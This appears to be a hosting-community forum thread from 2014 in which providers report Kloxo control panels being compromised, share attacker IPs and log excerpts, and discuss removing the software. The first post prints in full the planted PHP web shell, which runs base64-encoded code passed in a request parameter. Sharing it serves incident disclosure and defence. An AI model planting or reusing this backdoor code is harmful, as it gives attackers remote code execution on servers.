amuck-landowner

Kloxo installations compromised

Damian

New Member
Verified Provider
We had been considering dropping the Kloxo "Host In A Box" template anyway, since it hasn't been updated for 2+ years, but now the final nail has been driven into the coffin.

Our clients are getting their Kloxo installations compromised with a randomly-named PHP file placed into  ./home/kloxo/httpd/default/, which is the 'default' site accessible by IP address.

UPDATE: default.php in the same directory will also be compromised. See source here: http://disclosed.info/?9b00e7fa79636e07#rZKQYHUkErNv0ZFArSkUyBQ8C8YLSVaSsaRVo9nfypc=

This PHP file contains (also at http://disclosed.info/?7c12a1a4560b7664#5fpnfdknf4EfBcGqLjeV9/vAY1RXEKkLC3+fqm16c6E= ):


<?php

set_time_limit(0);error_reporting(NULL);

if(($_REQUEST['8ba7afbaaddc67de33a3f'])!=NULL){eval(base64_decode($_REQUEST['8ba7afbaaddc67de33a3f']));}

else{echo '<!DOCTYPE HTML PUBLIC\"-//IETF//DTDHTML 2.0//EN\"><html><head><title></title></head><body>Access denied.</body ></html >';}

?>

 

Where the $_REQUEST variable is a random value. The basic premise of the script is: if the specific $_REQUEST variable is set, then decode and run all of the code passed via variable. This is obviously bad.

 

All of the requests to run the script successfully have, thus far, come from: 176.31.146.168 (France, OVH Systems, OVH Systems, AS16276 OVH Systems, doesn't have rDNS)

 

Currently, these are being used to send extremely wimpy (20-40k pps, see http://d.pr/i/BXlo ) DDOS; the script used seems to be poorly written, as it slams CPU usage before it gets anywhere near maximum network utilization. We've had 4 instances this morning, and it's effected Ramnode, if not others. Beware!
 
Last edited by a moderator:

vRozenSch00n

Active Member
Kloxo "Host In A Box" template is a disaster as it has never been upgraded for years. Moreover, regular user never upgrade new installation to the latest version (6.1.12) and they don't use any firewall.

Even the latest version has many vulnerabilities i.e. recursive bind, apache exploit through lxphp, brute force through the admin login and several other minor issues such as master/slave config that will break apache vhost configuration. 

AFAIK there was a disagreement among the developers, that leads to the Kloxo-MR fork.
 

SkylarM

Well-Known Member
Verified Provider
We don't provide that template, but just suspended like 15-20 containers for this. Killed CPU on nodes long before any massive network issues, but the amount of them caused a few fun times :p
 

vRozenSch00n

Active Member
My test VPS was also compromised with the same issue, and I found out from the log that they brute forced the control panel login. The log shows that it comes from IP 178.248.23.39
 

Steven

New Member
It appears to be an sql Injection:
 

access_log:178.248.23.58 - [26/Jan/2014:18:11:58 +0300] "<snipped the inject> HTTP/1.1" 200 5 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0"

They are getting access the admin  user:
 

login_success:12:27 Jan/27/2014: Successful Login to admin from 178.248.23.29

They are injecting files using display.php
 

shell_exec:12:27 Jan/27/2014: 0: [(__system__:/usr/local/lxlabs/kloxo/httpdocs) 'chmod' '0644' '/home/kloxo/httpd/default/default.php']
filesys:12:27 Jan/27/2014: Chown /home/kloxo/httpd/default/default.php to root:root

NOTE: default.php is being injected into 'every' account.
 
Last edited by a moderator:

DaringHost

New Member
Also just suspended a decent number of VPS's who were effected by this. I checked the admin access logs for one client and see that the admin account was accessed by these two IP addresses: 178.248.23.122 and 178.248.23.174

Nulled 178.248.23.0/24 across all servers.
 
Last edited by a moderator:

vRozenSch00n

Active Member
As I stated before, after the disagreement (which makes me sad :( ), Kloxo development slowed down and Kloxo-MR managed to fork it's way to a more secure and stable control panel, with the ability to change php version on the fly and using nginx or varnish as reverse proxy.
 

DomainBop

Dormant VPSB Pathogen
Iniz sent out emails today requiring clients to remove Kloxo immediately.  Hopefully other hosts swill also ban the use of Kloxo (and ZPanel) and remove them from their templates.
 

DomainBop

Dormant VPSB Pathogen
Moreover, regular user never upgrade new installation to the latest version (6.1.12) and they don't use any firewall.
A very large percentage of web sites are running outdated scripts that contain vulnerabilities, including many corporate websites (example: Wordpress 3.4.2 http://mybuys.com/readme.html).   It's not surprising that people/companies don't take the security of their websites seriously since many companies and government agencies allow their employees to surf the Internet from their desks using outdatedbrowsers that are full of vulnerabilities (I'm looking at a piwik report for one of my sites and I see a visitor from the US Postal Service who is using Internet Explorer 7)
 

MartinD

Retired Staff
Verified Provider
Retired Staff
This is wreaking havoc - totally come out of nowhere and gone nuts!
 

wlanboy

Content Contributer
Iniz sent out emails today requiring clients to remove Kloxo immediately.  Hopefully other hosts swill also ban the use of Kloxo (and ZPanel) and remove them from their templates.
Tactical VPS did that too.

Templates are bad because they suggest (through the eyes of the customer) that they are save by default because the hoster is offering them.
 

vRozenSch00n

Active Member
Second that - both are beyond any repair.
I don't know much about zPanel, but in Kloxo's case, there are a lot of rubbish files leftover and rubbish functions. This is due to the fact that late Ligesh wanted to integrate Windows and Debian functionalities (you should have seen the source code prior to version 6.1.6). It's also seems that the way he coded is based on in time patch.

Yes, it needs a whole lot of cleaning up or simply rewrite from scratch. 
 
Top
amuck-landowner